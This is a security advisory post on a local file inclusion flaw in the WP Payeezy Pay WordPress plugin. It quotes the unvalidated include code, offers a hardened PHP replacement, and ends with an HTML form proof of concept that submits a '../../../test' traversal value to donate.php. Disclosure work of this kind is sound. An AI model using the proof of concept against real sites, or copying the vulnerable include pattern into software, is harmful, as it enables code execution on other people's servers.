As we have noted already this week, we have just made a major improvement to our proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced into plugins. That monitoring builds on code we had developed for our Plugin Security Checker, an automated tool you can use to check if plugins you use contain possible security issues. Again it has identified a fairly serious vulnerability, this time a local file inclusion (LFI) vulnerability in the plugin WP Payeezy Pay. This vulnerability has gone unnoticed for over two years.
This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker, since it would already have notified you of this possible issue if you had checked the plugin.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior, we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed.
In the plugin’s files /donate.php, /donate-rec.php, /pay.php, and /pay-rec.php the first lines of code are:
$transactionKeyFile = $_POST["x_login"] . '.php';
include $transactionKeyFile;
That appends “.php” to the value of the POST input “x_login” and includes the resulting path without any validation, which is a local file inclusion (LFI) vulnerability. Two details matter for assessing the impact. First, these files are requested directly by their URL rather than through WordPress, so none of WordPress’s authentication, capability or nonce checks apply; anyone who can reach the site can send the request. Second, include executes the target as PHP code, so while the hard-coded “.php” suffix restricts the attack to files ending in .php, any such file an attacker can place on the server (for example through an unrelated upload weakness) would run with the web server’s privileges.
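The following is an added example written for this post, not code from the WP Payeezy Pay plugin or a fix supplied by its developer. It shows the vulnerable pattern above next to a hardened replacement that (a) restricts the “x_login” value to an allowlisted character set, so traversal sequences and NUL bytes are rejected before any filesystem access, and (b) canonicalises the candidate path with realpath() and confirms it still lies inside a fixed key directory. The function name, the directory name `keys`, and the 400 response are assumptions made for the example.

```php
<?php
// Added example, not the plugin's own code.
//
// Vulnerable pattern from the advisory, for comparison (do not use):
//   $transactionKeyFile = $_POST["x_login"] . '.php';
//   include $transactionKeyFile;

/**
 * Resolve the per-merchant transaction key file for an x_login value.
 *
 * Hardened version (assumed design, not the plugin's own fix):
 *  1. the key name must match a strict allowlist, so "../", "/", "\"
 *     and NUL bytes never reach the filesystem;
 *  2. both the base directory and the candidate file are canonicalised
 *     with realpath(), which also follows and resolves symlinks;
 *  3. the resolved file must still sit inside the base directory.
 *
 * Returns the absolute path to include, or null if the request is rejected.
 */
function resolve_transaction_key_file(string $x_login, string $key_dir): ?string
{
    // 1. Allowlist: letters, digits, underscore and hyphen only, 1-64 chars.
    //    \A and \z anchor the whole string (a trailing newline would pass "$").
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $x_login)) {
        return null;
    }

    // 2. Canonicalise the base directory; it must exist.
    $base = realpath($key_dir);
    if ($base === false || !is_dir($base)) {
        return null;
    }

    // Canonicalise the candidate; realpath() returns false if it does not exist.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $x_login . '.php');
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // 3. Containment check: the resolved path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

// How pay.php / donate.php could use it. "keys" is an assumed directory name.
$keyDir = __DIR__ . DIRECTORY_SEPARATOR . 'keys';
$keyFile = resolve_transaction_key_file((string)($_POST['x_login'] ?? ''), $keyDir);

if ($keyFile === null) {
    http_response_code(400);
    exit('Invalid merchant login.');
}

include $keyFile;
```

With this in place the proof-of-concept value “../../../test” fails at step 1 because “.” and “/” are not in the allowlist, and even a value that somehow passed the pattern could only ever select a file that realpath() places inside the key directory. Note that the allowlist alone is what blocks the traversal; the realpath() containment check is defence in depth against symlinks inside the key directory pointing elsewhere.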
Proof of Concept
The following proof of concept will cause a file named test.php in the root directory of the WordPress installation to be included. The three “../” segments climb from /wp-content/plugins/wp-payeezy-pay/ up through /wp-content/plugins/ and /wp-content/ to the root directory, and the plugin then appends “.php” to “test”.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-payeezy-pay/donate.php" method="POST">
<input type="hidden" name="x_login" value="../../../test" />
<input type="submit" value="Submit" />
</form>
</body>
</html>